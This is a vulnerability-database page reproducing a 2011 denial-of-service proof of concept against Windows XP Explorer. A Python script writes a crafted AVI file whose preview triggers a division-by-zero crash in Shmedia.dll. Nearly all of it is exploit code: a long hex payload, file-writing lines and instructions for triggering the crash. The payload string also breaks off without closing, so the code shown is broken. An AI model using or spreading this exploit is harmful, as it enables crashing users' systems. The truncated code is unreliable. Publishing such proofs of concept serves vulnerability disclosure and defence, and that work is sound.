Vulners
Lucene search
Windows Explorer 6.0.2900.5512 Denial Of Service
`# done by BraniX <[email protected]>
# www.hackers.org.pl
# found: 2011.03.27
# published: 2011.03.29
# tested on: Windows XP SP3 Home Edition
# tested on: Windows XP SP3 Professional Edition
# App: Windows Explorer 6.0.2900.5512 (Shmedia.dll 6.0.2900.5512)
# App Url: http://www.micro$oft.com
# Shmedia.dll 6.0.2900.5512 MD5: 1b8182c8fe6172727c3cf47415cbad8f
# Explorer 6.0.2900.5512 MD5: c791ed9eac5e76d9525e157b1d7a599a
# DoS is caused by unhandled exception in module Shmedia.dll loaded via Explorer.exe
# 5CF4AC4A 8B4C24 14 MOV ECX,DWORD PTR SS:[ESP+14] ; ECX = 0
# 5CF4AC4E 8B4424 10 MOV EAX,DWORD PTR SS:[ESP+10] ; EAX = 1
# 5CF4AC52 33D2 XOR EDX,EDX ; EDX = 0
# 5CF4AC54 F7F1 DIV ECX ; Integer division by zero
filepath = "C:\\Windows Explorer 6.0.2900.5512 (Shmedia.dll 6.0.2900.5512) DoS PoC.avi"
f = open(filepath, "wb")
poc = '\x52\x49\x46\x46\x60\x17\x00\x00\x41\x56\x49\x20\x4C\x49\x53\x54\x14\x04\x00\x00\x68\x64\x72\x6C\x61\x76\x69\x68\x38\x00\x00\x00\xA0\x86\x01\x00\xC8\x04\x00\x00\x00\x00\x00\x00\x10\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x28\x01\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\xC8\x03\x00\x00\x73\x74\x72\x6C\x73\x74\x72\x68\x38\x00\x00\x00\x76\x69\x64\x73\x6D\x72\x6C\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x01\x00\x00\x10\x27\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x10\x00\x73\x74\x72\x66\x5C\x03\x00\x00\x28\x00\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x01\x00\x08\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xCD\x00\x00\x00\x00\x00\x00\x00\x6E\x62\x5F\x00\x70\x5B\x65\x00\x6D\x6B\x6B\x00\x6E\x6B\x6C\x00\x6E\x6C\x6C\x00\x70\x64\x61\x00\x70\x66\x64\x00\x78\x69\x67\x00\x7A\x6F\x67\x00\x7B\x67\x6D\x00\x70\x6A\x6D\x00\x70\x6C\x6E\x00\x79\x6B\x69\x00\x7B\x72\x6B\x00\x7B\x72\x6C\x00\x89\x7A\x6F\x00\x89\x7D\x75\x00\x84\x7D\x7D\x00\x89\x7F\x78\x00\x8C\x7C\x7A\x00\x8D\x7F\x7D\x00\xAE\x7B\x6E\x00\x89\x80\x7A\x00\x89\x82\x7D\x00\x8D\x80\x7C\x00\x92\x81\x7B\x00\x93\x84\x79\x00\x91\x82\x7F\x00\x94\x83\x7E\x00\x93\x86\x7E\x00\x95\x87\x7D\x00\x9B\x84\x7D\x00\x93\x88\x7F\x00\xB5\x82\x72\x00\xBB\x88\x75\x00\xE1\x8D\x46\x00\xF7\xA6\x43\x00\xC2\x8F\x79\x00\xC8\x95\x7C\x00\xEB\xAB\x7C\x00\xD2\x3E\xB3\x00\x85\x7B\x85\x00\x87\x76\x8D\x00\x91\x7B\x93\x00\x93\x7C\x93\x00\xA8\x45\xA9\x00\xE3\x0D\xD9\x00\xFE\x00\xFE\x00\xFF\x2D\xFF\x00\xCA\x5D\xCC\x00\xC3\x6A\xFF\x00\xCB\x73\xFF\x00\xD4\x71\xFF\x00\xDB\x77\xFF\x00\x78\x90\xB5\x00\x52\x84\xCE\x00\x51\x85\xD0\x00\x59\xB7\xFC\x00\x62\xBB\xFD\x00\x64\xBA\xFC\x00\x93\x89\x82\x00\x95\x8A\x82\x00\x94\x8B\x84\x00\x95\x8C\x85\x00\x95\x8E\x89\x00\x96\x91\x8D\x00\xB8\x8E\x8B\x00\xA2\x90\x86\x00\xA2\x91\x88\x00\xA6\x96\x88\x00\xA6\x9A\x8D\x00\xB6\x91\x8B\x00\xA6\x9D\x93\x00\xAF\xA3\x9A\x00\xAF\xA4\x9D\x00\xB0\xA2\x95\x00\xB0\xA3\x98\x00\xB0\xA4\x99\x00\xB0\xA8\x9F\x00\xAF\xA6\xA1\x00\xAF\xA8\xA3\x00\xAF\xA9\xA5\x00\xC6\x99\x83\x00\xCF\x9C\x80\x00\xC1\x96\x93\x00\xC3\x99\x95\x00\xC4\x99\x95\x00\xC6\x9C\x96\x00\xC8\x9E\x97\x00\xD5\xA2\x83\x00\xD6\xA3\x84\x00\xDC\xA9\x87\x00\xDE\xAB\x88\x00\xC3\xAA\x92\x00\xC6\xA8\x90\x00\xCC\xA1\x99\x00\xD2\xA4\x97\x00\xD3\xA6\x98\x00\xD6\xA8\x9A\x00\xD9\xAD\x9D\x00\xD9\xB1\x9B\x00\xD6\xB8\x9D\x00\xC8\xB7\xA9\x00\xC8\xB9\xAD\x00\xD3\xBE\xB9\x00\xEE\xBD\xA5\x00\xEF\xBF\xA8\x00\xF5\xB3\xAA\x00\xD6\xC3\xA7\x00\xD4\xC0\xAB\x00\xDD\xCF\xB5\x00\xDB\xC6\xBF\x00\xEA\xCA\xA5\x00\xF0\xC1\xAB\x00\xF0\xC3\xAF\x00\xF9\xCF\xAE\x00\xE7\xD2\xAD\x00\xFA\xD0\xAE\x00\xE3\xCB\xBD\x00\xF1\xC5\xB1\x00\xF2\xC8\xB6\x00\xF4\xC9\xBA\x00\xF3\xCC\xBA\x00\xF3\xCD\xBD\x00\xEF\xD5\xB4\x00\xEF\xD1\xBB\x00\xEE\xD6\xBA\x00\xF9\xD2\xB1\x00\xFA\xD4\xB4\x00\xF3\xDE\xB5\x00\xF4\xDF\xB6\x00\xFA\xD6\xB8\x00\xFA\xD8\xBB\x00\xFA\xD9\xBD\x00\xFF\xED\xB6\x00\xF0\xE1\xBD\x00\xFF\xEA\xB9\x00\xFF\xED\xBA\x00\xFF\xF2\xBF\x00\xFF\xF4\xBC\x00\x8D\xB1\xCC\x00\x92\xB7\xCF\x00\x93\xA5\xD6\x00\x92\xB7\xD0\x00\xBC\xC8\xD6\x00\xBD\xCE\xDD\x00\xDA\xC8\xC2\x00\xDB\xCB\xC7\x00\xC1\xCF\xD7\x00\xC9\xD5\xDB\x00\xCE\xD5\xDD\x00\xD3\xD2\xD4\x00\xD2\xDB\xDE\x00\xD9\xDD\xDC\x00\xE3\xCC\xC0\x00\xE4\xCD\xC0\x00\xE4\xCF\xC9\x00\xE5\xCF\xCC\x00\xE5\xD1\xCC\x00\xFA\xDB\xC2\x00\xFA\xDC\xC2\x00\xFB\xDE\xC4\x00\xFF\xD5\xCC\x00\xE6\xD3\xD0\x00\xFA\xE0\xC8\x00\xFC\xE1\xCB\x00\xFB\xE2\xCD\x00\xFC\xE2\xCC\x00\xFC\xE4\xCF\x00\xFF\xF8\xC6\x00\xFF\xF4\xCC\x00\xFF\xFE\xCA\x00\xFF\xFC\xCF\x00\xF1\xE7\xD4\x00\xFC\xE4\xD0\x00\xFC\xE6\xD4\x00\xFC\xE8\xD7\x00\xFC\xE8\xD8\x00\xFC\xEB\xDD\x00\xFD\xEC\xDD\x00\xFF\xFF\xD3\x00\xFF\xFF\xDD\x00\xC9\xD8\xE1\x00\xC9\xDB\xE4\x00\xD2\xDD\xE1\x00\xD2\xDF\xE6\x00\xD8\xE0\xE0\x00\xD3\xE1\xE9\x00\xFD\xEE\xE0\x00\xFD\xF0\xE5\x00\xFB\xF4\xE7\x00\xFF\xFF\xE3\x00\xFF\xF9\xE4\x00\xF8\xF2\xEA\x00\xFD\xF2\xE9\x00\xFD\xF3\xEC\x00\xFD\xF4\xED\x00\xFF\xFF\xE9\x00\xFE\xF6\xF0\x00\xFE\xF8\xF1\x00\xFF\xFF\xF0\x00\xFE\xFA\xF5\x00\xFF\xFB
f.write(poc)
f.close()
print "Done, 1 file generated on 'C:\\' ..."
print "Highlight (select) generated file in Explorer"
print "DoS is triggered when Explorer tries to render AVI file for preview"
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Mar 2011 00:00Current
0.3Low risk
Vulners AI Score0.3